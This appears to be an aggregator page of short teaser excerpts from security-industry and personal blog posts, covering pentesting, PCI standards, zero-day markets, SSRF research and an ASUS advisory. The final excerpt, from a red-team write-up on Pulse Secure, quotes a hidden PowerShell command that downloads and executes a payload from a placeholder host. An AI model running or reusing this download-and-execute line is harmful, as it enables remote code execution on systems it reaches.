My View on The State of US Politics
.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; } .bh__table_cell { padding: 5px; background-color: #FFFFFF; } .bh__table_cell p { color:...
Read more →Category: Mix
Celebrating International Women in Engineering Day
While there has been progress in increasing the number of women in engineering roles, the representation of women in this field...
Read more →
CVE-2024-2080: ASUS warns customers
ASUS announces major Firmware Update ASUS recently issued a firmware update to resolve a critical security vulnerability affecting seven different...
Read more →
Community-driven PTaaS vs. Traditional Pentesting
Modern pentesting approaches use independent security researchers working under strict NDAs and advanced software platforms to streamline the process. However,...
Read more →
What You Need to Know and What the End of v3.2.1 Means for the Future of Digital Payments –
On March 31st, 2024, The Payments Card Industry Standards Security Council (PCI SSC) officially retired version 3.2.1 of the PCI...
Read more →
How Zerodium, BugTraq, and Fear contributed to the Rise of the Zero-Day Vulnerability Black Market –
Whenever a company is notified about or discovers a critical flaw in their system/application that has the potential to be...
Read more →
A List of My Hard-won Life Lessons
I’m working on my context.md file for my personal Digital Assistant, and one part of that will be my model.md...
Read more →
The Fast-Slow Problem
I’ve been obsessed lately with the concept of slow versus fast. I’m calling it the Fast-Slow Problem. It refers to...
Read more →
HackerOne’s Cloud Security Capabilities for AWS Customers
HackerOne provides security capabilities for AWS customers looking to improve security in their cloud applications. These include vulnerability pentests specific...
Read more →
What HackerOne Customers Can Tell You About Securing Organizational Buy-In for Ethical Hackers
Securing Organizational Buy-in For Ethical Hackers CISOs and other security leaders are challenged to demonstrate the benefits of working with...
Read more →
Piercing the Veil: Server Side Request Forgery to NIPRNet access | by Alyssa Herrera
The second Jira website I discovered was surprisingly harder to exploit. It didn’t give me the verbose errors like the...
Read more →
Hacking Pulse Secure for Redteaming
The code we used for the batch script is below. @echo off powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))”...
Read more →